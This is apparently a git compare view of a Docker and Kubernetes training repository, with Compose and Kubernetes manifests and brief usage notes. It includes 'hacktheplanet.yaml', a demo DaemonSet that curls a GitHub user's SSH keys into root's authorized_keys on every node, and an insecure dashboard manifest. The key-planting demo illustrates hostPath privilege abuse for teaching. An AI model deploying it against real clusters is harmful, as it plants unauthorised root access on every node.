Compare commits
qconuk2019...exercises · 294 commits:

6df7529885, 9a184c6d44, ba4ec23767, c690a02d37, 6bbf8a123c, cede1a4c12, e24a1755ec,
44e84c5f23, 947ab97b14, 45ea521acd, 99d2e99cea, 0d4b7d6c7e, 45ac1768a3, f0d991cd02,
4e1950821d, 2668a73fb0, 2d56d9f57c, b27f960483, 50211dcc6e, 35654762b3, a77fe701b7,
dee48d950e, 645d424a54, 875c552029, c2eb0de99a, 9efe1f3129, 14b7670c7d, f20e0b1435,
26317315b5, 5bf39669e3, c06b680fed, ba34183774, abda9431ae, 581635044b, b041a2f9ec,
7fd8b7db2d, dcd91c46b7, 076a68379d, 741faed32e, 9a9f7a3c72, a458c41068, ce6cdae80c,
73f0d61759, 0ae7d38b68, 093e3ab5ab, be72fbe80a, 560328327c, 9f1d2581fc, ab1a360cdc,
860907ccf0, ad4c86b3f4, 8f7ca0d261, 626e4a8e35, b21f61ad27, bac0d9febd, 313df8f9ff,
ef6a5f05f8, d71a636a9d, 990a873e81, 98836d85cf, c959a4c4a1, c3a796faef, 56cc65daf2,
a541e53c78, 7a63dfb0cf, 093cfd1c24, 8492524798, 12b625d4f6, a78e99d97e, 161b8aed7d,
4f1252d0b6, 1b407cbc5e, dd6f3c9eee, d4afae54b8, 730ef0f421, c1f9082fdc, 1fcb223a1d,
5e520dfbe5, 91d3f025b0, 79b8e5f2f0, f809faadb9, 4e225fdaf5, 36be4eaa9f, 57aa25fda0,
42ed6fc56a, 5aedee5564, 0a2879e1a5, 3e87e69608, b572d06f82, 2c0b4b15ba, f91e995e90,
59c2ff1911, 879e7f2ec9, ad4cc074c1, ab8b478648, 68f35bd2ed, 964b92d320, db961b486f,
a90dcf1d9a, f4ef2bd6d4, baf428ebdb, 3a87183a66, 3f70ee2c2a, 68a26ae501, 2ef72a4dd8,
f4e16dccc4, 4c55336079, b22d3e3d21, 7b8370dc12, db6d2c8188, eb02875bd0, 4ba954cae4,
84b691a89d, c1e9073781, 6593f4ad42, bde7f75881, 25c820c87a, 39027675d5, f8e0de3519,
3a512779b2, d987f21cba, 1f08425437, f69c9853bb, c565dad43c, e48c23e4f4, eb04aacb5e,
b0f01e018c, 9504f81526, 12ef2eb66e, e4311a3037, 7309304ced, 26c876174a, 9775954b42,
d4500eff5a, 0ba6adb027, d3af9ff333, c9dc6fa7cb, 485704a169, 72fa8c366b, 8ea4b23530,
785a8178ca, 0dfff26410, 5b4debfd81, 69f9cee6c9, 4c44f3e690, b69119eed4, 940694a2b0,
c3de1049f1, 116515d19b, 098671ec20, 51e77cb62c, e2044fc2b2, f795d67f02, 6f6dc66818,
0ae39339b9, e6b73a98f4, 03657ea896, 4106059d4a, 2c0ed6ea2a, 3557a546e1, d3dd5503cf,
82f8f41639, dff8c1e43a, 9deeddc83a, dc7c1e95ca, a4babd1a77, 609756b4f3, c367ad1156,
06aba6737a, b9c08613ed, da2264d1ca, 66fbd7ee9e, a78bb4b2bf, 9dbd995c85, b535d43b02,
a77aabcf95, b42e4e6f80, 1af958488e, 2fe4644225, 3d001b0585, e42d9be1ce, d794c8df42,
85144c4f55, fba198d4d7, da8b4fb972, 74c9286087, d4c3686a2a, 9a66481cfd, f5d523d3c8,
9296b375f3, 6d761b4dcc, fada4e8ae7, dbcb4371d4, 3f40cc25a2, aa55a5b870, f272df9aae,
b92da2cf9f, fea69f62d6, 627c3361a1, 603baa0966, dd5a66704c, 95b05d8a23, c761ce9436,
020cfeb0ad, 4c89d48a0b, e2528191cd, 50710539af, 0e7c05757f, 6b21fa382a, 1ff3b52878,
307fd18f2c, ad81ae0109, 11c8ded632, 5413126534, ddcb02b759, ff111a2610, 5a4adb700a,
7c9f144f89, cde7c566f0, 8b2a8fbab6, 1e77f57434, 2dc634e1f5, df185c88a5, f40b8a1bfa,
ded5fbdcd4, 038563b5ea, d929f5f84c, cd1dafd9e5, 945586d975, aa6b74efcb, 4784a41a37,
0d551f682e, 9cc422f782, 287f6e1cdf, 2d3ddc570e, 82c26c2f19, 6636f92cf5, ff4219ab5d,
71cfade398, c44449399a, 637c46e372, ad9f845184, 3368e21831, 46ce3d0b3d, 41eb916811,
1c76e23525, 2b2d7c5544, 84c233a954, 0019b22f1d, 6fe1727061, a4b23e3f02, d5fd297c2d,
3ad1e89620, d1609f0725, ef70ed8006, 5f75f04c97, 38097a17df, afa7b47c7a, 4d475334b5,
59f2416c56, 9c5fa6f15e, c1e6fe1d11, 99adc846ba, 1ee4c31135, 6f655bff03, 7fbabd5cc2,
c1d4df38e5, 8e6a18d5f7, d902f2e6e6, 8ba825db54, 1309409528, b3a9a017d9, 3c6cbff913,
48a5fb5c7a, ed11f089e1, 461020300d, f4e4d13f68, 5b2a5c1f05, fdf5a1311a, 95e2128e7c,
4a8cc82326, a4e50f6c6f, a85266c44c, 5977b11f33, 3351cf2d13, facb5997b7, b4d2a5769a,
2cff684e79, ea3e19c5c5, d9c8f2bc57, 304faff96b, 852135df9a, ae6a5a5800, 0160d9f287
.gitignore (vendored) · 1 change

@@ -7,7 +7,6 @@ slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
node_modules

### macOS ###

@@ -39,7 +39,7 @@ your own tutorials.
All these materials have been gathered in a single repository
because they have a few things in common:

- some [common slides](slides/common/) that are re-used
- some [shared slides](slides/shared/) that are re-used
  (and updated) identically between different decks;
- a [build system](slides/) generating HTML slides from
  Markdown source files;
compose/frr-route-reflector/conf/bgpd.conf (new file) · 9 lines

@@ -0,0 +1,9 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout
compose/frr-route-reflector/conf/vtysh.conf (new file) · 0 lines
compose/frr-route-reflector/conf/zebra.conf (new file) · 2 lines

@@ -0,0 +1,2 @@
hostname frr
log stdout
compose/frr-route-reflector/docker-compose.yaml (new file) · 34 lines

@@ -0,0 +1,34 @@
version: "3"

services:
  bgpd:
    image: ajones17/frr:662
    volumes:
    - ./conf:/etc/frr
    - ./run:/var/run/frr
    network_mode: host
    entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
    restart: always

  zebra:
    image: ajones17/frr:662
    volumes:
    - ./conf:/etc/frr
    - ./run:/var/run/frr
    network_mode: host
    entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
    restart: always

  vtysh:
    image: ajones17/frr:662
    volumes:
    - ./conf:/etc/frr
    - ./run:/var/run/frr
    network_mode: host
    entrypoint: vtysh -c "show ip bgp"

  chmod:
    image: alpine
    volumes:
    - ./run:/var/run/frr
    command: chmod 777 /var/run/frr
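
Taken together, the conf files and this Compose file run an FRR BGP route reflector on the host network. A minimal smoke test, assuming Compose is run from compose/frr-route-reflector/:

    # Fix socket permissions with the one-shot chmod service, then start the daemons.
    docker-compose up -d chmod bgpd zebra
    # Dump the BGP table through the one-shot vtysh service.
    docker-compose run --rm vtysh

The chmod one-shot exists because bgpd and zebra need a writable /var/run/frr, shared between the services through the ./run bind mount.
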
compose/kube-router-k8s-control-plane/docker-compose.yaml (new file) · 29 lines

@@ -0,0 +1,29 @@
version: "3"

services:

  pause:
    ports:
    - 8080:8080
    image: k8s.gcr.io/pause

  etcd:
    network_mode: "service:pause"
    image: k8s.gcr.io/etcd:3.3.10
    command: etcd

  kube-apiserver:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.14.0
    command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged

  kube-controller-manager:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.14.0
    command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
    "Edit the CLUSTER placeholder first. Then, remove this line.":

  kube-scheduler:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.14.0
    command: kube-scheduler --master http://localhost:8080
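
The 10.CLUSTER.0.0/16 placeholder (and the tripwire key right after it) force each user to pick their own cluster CIDR before the file will parse. A sketch of the intended edit, with 10.99.0.0/16 as a made-up example value:

    sed -i 's/10.CLUSTER.0.0/10.99.0.0/' docker-compose.yaml
    # Drop the "Edit the CLUSTER placeholder..." tripwire line, then start everything.
    sed -i '/Edit the CLUSTER placeholder/d' docker-compose.yaml
    docker-compose up -d
    curl http://localhost:8080/healthz   # the API server should answer "ok" on the pause container's port
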
compose/kube-router-k8s-control-plane/kuberouter.yaml (new file) · 128 lines

@@ -0,0 +1,128 @@
---
apiVersion: |+

  Make sure you update the line with --master=http://X.X.X.X:8080 below.
  Then remove this section from this YAML file and try again.

---
apiVersion: v1
kind: ConfigMap
metadata:
  name: kube-router-cfg
  namespace: kube-system
  labels:
    tier: node
    k8s-app: kube-router
data:
  cni-conf.json: |
    {
      "cniVersion":"0.3.0",
      "name":"mynet",
      "plugins":[
        {
          "name":"kubernetes",
          "type":"bridge",
          "bridge":"kube-bridge",
          "isDefaultGateway":true,
          "ipam":{
            "type":"host-local"
          }
        }
      ]
    }
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  labels:
    k8s-app: kube-router
    tier: node
  name: kube-router
  namespace: kube-system
spec:
  template:
    metadata:
      labels:
        k8s-app: kube-router
        tier: node
      annotations:
        scheduler.alpha.kubernetes.io/critical-pod: ''
    spec:
      serviceAccountName: kube-router
      containers:
      - name: kube-router
        image: docker.io/cloudnativelabs/kube-router
        imagePullPolicy: Always
        args:
        - "--run-router=true"
        - "--run-firewall=true"
        - "--run-service-proxy=true"
        - "--master=http://X.X.X.X:8080"
        env:
        - name: NODE_NAME
          valueFrom:
            fieldRef:
              fieldPath: spec.nodeName
        - name: KUBE_ROUTER_CNI_CONF_FILE
          value: /etc/cni/net.d/10-kuberouter.conflist
        livenessProbe:
          httpGet:
            path: /healthz
            port: 20244
          initialDelaySeconds: 10
          periodSeconds: 3
        resources:
          requests:
            cpu: 250m
            memory: 250Mi
        securityContext:
          privileged: true
        volumeMounts:
        - name: lib-modules
          mountPath: /lib/modules
          readOnly: true
        - name: cni-conf-dir
          mountPath: /etc/cni/net.d
      initContainers:
      - name: install-cni
        image: busybox
        imagePullPolicy: Always
        command:
        - /bin/sh
        - -c
        - set -e -x;
          if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
            if [ -f /etc/cni/net.d/*.conf ]; then
              rm -f /etc/cni/net.d/*.conf;
            fi;
            TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
            cp /etc/kube-router/cni-conf.json ${TMP};
            mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
          fi
        volumeMounts:
        - mountPath: /etc/cni/net.d
          name: cni-conf-dir
        - mountPath: /etc/kube-router
          name: kube-router-cfg
      hostNetwork: true
      tolerations:
      - key: CriticalAddonsOnly
        operator: Exists
      - effect: NoSchedule
        key: node-role.kubernetes.io/master
        operator: Exists
      - effect: NoSchedule
        key: node.kubernetes.io/not-ready
        operator: Exists
      volumes:
      - name: lib-modules
        hostPath:
          path: /lib/modules
      - name: cni-conf-dir
        hostPath:
          path: /etc/cni/net.d
      - name: kube-router-cfg
        configMap:
          name: kube-router-cfg
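
Same idea here: the stray `apiVersion: |+` document at the top keeps the file invalid until the --master address is filled in. A sketch, assuming the control plane from the Compose file above answers on 10.0.0.1:8080 (made-up address):

    # Point kube-router at the API server, remove the tripwire section at the top of
    # the file, then submit the manifest to that same API server.
    sed -i 's|http://X.X.X.X:8080|http://10.0.0.1:8080|' kuberouter.yaml
    kubectl --server http://10.0.0.1:8080 apply -f kuberouter.yaml
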
compose/simple-k8s-control-plane/docker-compose.yaml (new file) · 28 lines

@@ -0,0 +1,28 @@
version: "3"

services:

  pause:
    ports:
    - 8080:8080
    image: k8s.gcr.io/pause

  etcd:
    network_mode: "service:pause"
    image: k8s.gcr.io/etcd:3.3.10
    command: etcd

  kube-apiserver:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.14.0
    command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount

  kube-controller-manager:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.14.0
    command: kube-controller-manager --master http://localhost:8080

  kube-scheduler:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.14.0
    command: kube-scheduler --master http://localhost:8080
@@ -72,7 +72,7 @@ spec:
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.4.0"
        image: "consul:1.4.4"
        args:
        - "agent"
        - "-bootstrap-expect=3"
k8s/efk.yaml · 108 changes

@@ -3,7 +3,6 @@ apiVersion: v1
kind: ServiceAccount
metadata:
  name: fluentd

---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
@@ -19,7 +18,6 @@ rules:
  - get
  - list
  - watch

---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
@@ -33,23 +31,18 @@ subjects:
- kind: ServiceAccount
  name: fluentd
  namespace: default

---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  name: fluentd
  labels:
    k8s-app: fluentd-logging
    version: v1
    kubernetes.io/cluster-service: "true"
    app: fluentd
spec:
  template:
    metadata:
      labels:
        k8s-app: fluentd-logging
        version: v1
        kubernetes.io/cluster-service: "true"
        app: fluentd
    spec:
      serviceAccount: fluentd
      serviceAccountName: fluentd
@@ -58,7 +51,7 @@ spec:
        effect: NoSchedule
      containers:
      - name: fluentd
        image: fluent/fluentd-kubernetes-daemonset:elasticsearch
        image: fluent/fluentd-kubernetes-daemonset:v1.3-debian-elasticsearch-1
        env:
        - name: FLUENT_ELASTICSEARCH_HOST
          value: "elasticsearch"
@@ -66,14 +59,12 @@ spec:
          value: "9200"
        - name: FLUENT_ELASTICSEARCH_SCHEME
          value: "http"
        # X-Pack Authentication
        # =====================
        - name: FLUENT_ELASTICSEARCH_USER
          value: "elastic"
        - name: FLUENT_ELASTICSEARCH_PASSWORD
          value: "changeme"
        - name: FLUENT_UID
          value: "0"
        - name: FLUENTD_SYSTEMD_CONF
          value: "disable"
        - name: FLUENTD_PROMETHEUS_CONF
          value: "disable"
        resources:
          limits:
            memory: 200Mi
@@ -94,134 +85,83 @@ spec:
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers

---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  annotations:
    deployment.kubernetes.io/revision: "1"
  creationTimestamp: null
  generation: 1
  labels:
    run: elasticsearch
    app: elasticsearch
  name: elasticsearch
  selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
spec:
  progressDeadlineSeconds: 600
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      run: elasticsearch
  strategy:
    rollingUpdate:
      maxSurge: 1
      maxUnavailable: 1
    type: RollingUpdate
      app: elasticsearch
  template:
    metadata:
      creationTimestamp: null
      labels:
        run: elasticsearch
        app: elasticsearch
    spec:
      containers:
      - image: elasticsearch:5.6.8
        imagePullPolicy: IfNotPresent
      - image: elasticsearch:5
        name: elasticsearch
        resources: {}
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
        resources:
          limits:
            memory: 2Gi
          requests:
            memory: 1Gi
        env:
        - name: ES_JAVA_OPTS
          value: "-Xms1g -Xmx1g"
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      terminationGracePeriodSeconds: 30

---
apiVersion: v1
kind: Service
metadata:
  creationTimestamp: null
  labels:
    run: elasticsearch
    app: elasticsearch
  name: elasticsearch
  selfLink: /api/v1/namespaces/default/services/elasticsearch
spec:
  ports:
  - port: 9200
    protocol: TCP
    targetPort: 9200
  selector:
    run: elasticsearch
  sessionAffinity: None
    app: elasticsearch
  type: ClusterIP

---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  annotations:
    deployment.kubernetes.io/revision: "1"
  creationTimestamp: null
  generation: 1
  labels:
    run: kibana
    app: kibana
  name: kibana
  selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
spec:
  progressDeadlineSeconds: 600
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      run: kibana
  strategy:
    rollingUpdate:
      maxSurge: 1
      maxUnavailable: 1
    type: RollingUpdate
      app: kibana
  template:
    metadata:
      creationTimestamp: null
      labels:
        run: kibana
        app: kibana
    spec:
      containers:
      - env:
        - name: ELASTICSEARCH_URL
          value: http://elasticsearch:9200/
        image: kibana:5.6.8
        imagePullPolicy: Always
        image: kibana:5
        name: kibana
        resources: {}
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      terminationGracePeriodSeconds: 30

---
apiVersion: v1
kind: Service
metadata:
  creationTimestamp: null
  labels:
    run: kibana
    app: kibana
  name: kibana
  selfLink: /api/v1/namespaces/default/services/kibana
spec:
  externalTrafficPolicy: Cluster
  ports:
  - port: 5601
    protocol: TCP
    targetPort: 5601
  selector:
    run: kibana
  sessionAffinity: None
    app: kibana
  type: NodePort
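
One way to check the result of this EFK revision, assuming a cluster where these manifests apply cleanly:

    kubectl apply -f k8s/efk.yaml
    # Kibana is exposed as a NodePort service; look up the allocated port:
    kubectl get svc kibana -o jsonpath='{.spec.ports[0].nodePort}'
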
k8s/elasticsearch-cluster.yaml (new file) · 21 lines

@@ -0,0 +1,21 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
  name: es
spec:
  kibana:
    image: docker.elastic.co/kibana/kibana-oss:6.1.3
    image-pull-policy: Always
  cerebro:
    image: upmcenterprises/cerebro:0.7.2
    image-pull-policy: Always
  elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
  image-pull-policy: Always
  client-node-replicas: 2
  master-node-replicas: 3
  data-node-replicas: 3
  network-host: 0.0.0.0
  use-ssl: false
  data-volume-size: 10Gi
  java-options: "-Xms512m -Xmx512m"
k8s/elasticsearch-operator.yaml (new file) · 94 lines

@@ -0,0 +1,94 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
  name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
  resources: ["deployments", "replicasets", "daemonsets"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
  resources: ["customresourcedefinitions"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
  resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
  resources: ["cronjobs", "jobs"]
  verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
  resources: ["statefulsets", "deployments"]
  verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
  resources: ["elasticsearchclusters"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: elasticsearch-operator
subjects:
- kind: ServiceAccount
  name: elasticsearch-operator
  namespace: elasticsearch-operator
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
spec:
  replicas: 1
  template:
    metadata:
      labels:
        name: elasticsearch-operator
    spec:
      containers:
      - name: operator
        image: upmcenterprises/elasticsearch-operator:0.2.0
        imagePullPolicy: Always
        env:
        - name: NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
        ports:
        - containerPort: 8000
          name: http
        livenessProbe:
          httpGet:
            path: /live
            port: 8000
          initialDelaySeconds: 10
          timeoutSeconds: 10
        readinessProbe:
          httpGet:
            path: /ready
            port: 8000
          initialDelaySeconds: 10
          timeoutSeconds: 5
      serviceAccount: elasticsearch-operator
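
The ElasticsearchCluster resource a few files up is only meaningful once this operator (and the CRD it registers) is running, so the expected order is:

    kubectl apply -f k8s/elasticsearch-operator.yaml
    kubectl -n elasticsearch-operator get deployment   # wait until it is available
    kubectl apply -f k8s/elasticsearch-cluster.yaml
    kubectl get elasticsearchclusters
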
k8s/filebeat.yaml (new file) · 167 lines

@@ -0,0 +1,167 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-config
  namespace: kube-system
  labels:
    k8s-app: filebeat
data:
  filebeat.yml: |-
    filebeat.config:
      inputs:
        # Mounted `filebeat-inputs` configmap:
        path: ${path.config}/inputs.d/*.yml
        # Reload inputs configs as they change:
        reload.enabled: false
      modules:
        path: ${path.config}/modules.d/*.yml
        # Reload module configs as they change:
        reload.enabled: false

    # To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
    #filebeat.autodiscover:
    #  providers:
    #    - type: kubernetes
    #      hints.enabled: true

    processors:
      - add_cloud_metadata:

    cloud.id: ${ELASTIC_CLOUD_ID}
    cloud.auth: ${ELASTIC_CLOUD_AUTH}

    output.elasticsearch:
      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
      username: ${ELASTICSEARCH_USERNAME}
      password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-inputs
  namespace: kube-system
  labels:
    k8s-app: filebeat
data:
  kubernetes.yml: |-
    - type: docker
      containers.ids:
      - "*"
      processors:
        - add_kubernetes_metadata:
            in_cluster: true
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  name: filebeat
  namespace: kube-system
  labels:
    k8s-app: filebeat
spec:
  template:
    metadata:
      labels:
        k8s-app: filebeat
    spec:
      serviceAccountName: filebeat
      terminationGracePeriodSeconds: 30
      containers:
      - name: filebeat
        image: docker.elastic.co/beats/filebeat-oss:7.0.1
        args: [
          "-c", "/etc/filebeat.yml",
          "-e",
        ]
        env:
        - name: ELASTICSEARCH_HOST
          value: elasticsearch-es.default.svc.cluster.local
        - name: ELASTICSEARCH_PORT
          value: "9200"
        - name: ELASTICSEARCH_USERNAME
          value: elastic
        - name: ELASTICSEARCH_PASSWORD
          value: changeme
        - name: ELASTIC_CLOUD_ID
          value:
        - name: ELASTIC_CLOUD_AUTH
          value:
        securityContext:
          runAsUser: 0
          # If using Red Hat OpenShift uncomment this:
          #privileged: true
        resources:
          limits:
            memory: 200Mi
          requests:
            cpu: 100m
            memory: 100Mi
        volumeMounts:
        - name: config
          mountPath: /etc/filebeat.yml
          readOnly: true
          subPath: filebeat.yml
        - name: inputs
          mountPath: /usr/share/filebeat/inputs.d
          readOnly: true
        - name: data
          mountPath: /usr/share/filebeat/data
        - name: varlibdockercontainers
          mountPath: /var/lib/docker/containers
          readOnly: true
      volumes:
      - name: config
        configMap:
          defaultMode: 0600
          name: filebeat-config
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers
      - name: inputs
        configMap:
          defaultMode: 0600
          name: filebeat-inputs
      # data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
      - name: data
        hostPath:
          path: /var/lib/filebeat-data
          type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: filebeat
subjects:
- kind: ServiceAccount
  name: filebeat
  namespace: kube-system
roleRef:
  kind: ClusterRole
  name: filebeat
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: filebeat
  labels:
    k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
  resources:
  - namespaces
  - pods
  verbs:
  - get
  - watch
  - list
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: filebeat
  namespace: kube-system
  labels:
    k8s-app: filebeat
---
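
A quick way to confirm the Filebeat DaemonSet is running and shipping logs (the Elasticsearch endpoint baked into ELASTICSEARCH_HOST is specific to this setup):

    kubectl apply -f k8s/filebeat.yaml
    kubectl -n kube-system rollout status daemonset/filebeat
    kubectl -n kube-system logs -l k8s-app=filebeat --tail=10
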
k8s/hacktheplanet.yaml (new file) · 34 lines

@@ -0,0 +1,34 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hacktheplanet
spec:
  selector:
    matchLabels:
      app: hacktheplanet
  template:
    metadata:
      labels:
        app: hacktheplanet
    spec:
      volumes:
      - name: root
        hostPath:
          path: /root
      tolerations:
      - effect: NoSchedule
        operator: Exists
      initContainers:
      - name: hacktheplanet
        image: alpine
        volumeMounts:
        - name: root
          mountPath: /root
        command:
        - sh
        - -c
        - "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
      containers:
      - name: web
        image: nginx
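
This manifest is a security demo rather than infrastructure: anyone allowed to create a DaemonSet with a hostPath volume can plant an SSH key on every node, masters included (the bare NoSchedule toleration matches any taint with that effect). To watch it land everywhere:

    kubectl apply -f k8s/hacktheplanet.yaml
    kubectl get pods -l app=hacktheplanet -o wide   # one pod per node
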
k8s/insecure-dashboard.yaml (new file) · 220 lines

@@ -0,0 +1,220 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>

# ------------------- Dashboard Secret ------------------- #

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-certs
  namespace: kube-system
type: Opaque

---
# ------------------- Dashboard Service Account ------------------- #

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system

---
# ------------------- Dashboard Role & Role Binding ------------------- #

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: kubernetes-dashboard-minimal
  namespace: kube-system
rules:
  # Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["create"]
  # Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["create"]
  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
  resources: ["secrets"]
  resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
  verbs: ["get", "update", "delete"]
  # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
  resources: ["configmaps"]
  resourceNames: ["kubernetes-dashboard-settings"]
  verbs: ["get", "update"]
  # Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
  resources: ["services"]
  resourceNames: ["heapster"]
  verbs: ["proxy"]
- apiGroups: [""]
  resources: ["services/proxy"]
  resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
  verbs: ["get"]

---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: kubernetes-dashboard-minimal
  namespace: kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
  name: kubernetes-dashboard
  namespace: kube-system

---
# ------------------- Dashboard Deployment ------------------- #

kind: Deployment
apiVersion: apps/v1beta2
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  template:
    metadata:
      labels:
        k8s-app: kubernetes-dashboard
    spec:
      containers:
      - name: kubernetes-dashboard
        image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
        ports:
        - containerPort: 8443
          protocol: TCP
        args:
          - --auto-generate-certificates
          # Uncomment the following line to manually specify Kubernetes API server Host
          # If not specified, Dashboard will attempt to auto discover the API server and connect
          # to it. Uncomment only if the default does not work.
          # - --apiserver-host=http://my-address:port
        volumeMounts:
        - name: kubernetes-dashboard-certs
          mountPath: /certs
          # Create on-disk volume to store exec logs
        - mountPath: /tmp
          name: tmp-volume
        livenessProbe:
          httpGet:
            scheme: HTTPS
            path: /
            port: 8443
          initialDelaySeconds: 30
          timeoutSeconds: 30
      volumes:
      - name: kubernetes-dashboard-certs
        secret:
          secretName: kubernetes-dashboard-certs
      - name: tmp-volume
        emptyDir: {}
      serviceAccountName: kubernetes-dashboard
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule

---
# ------------------- Dashboard Service ------------------- #

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
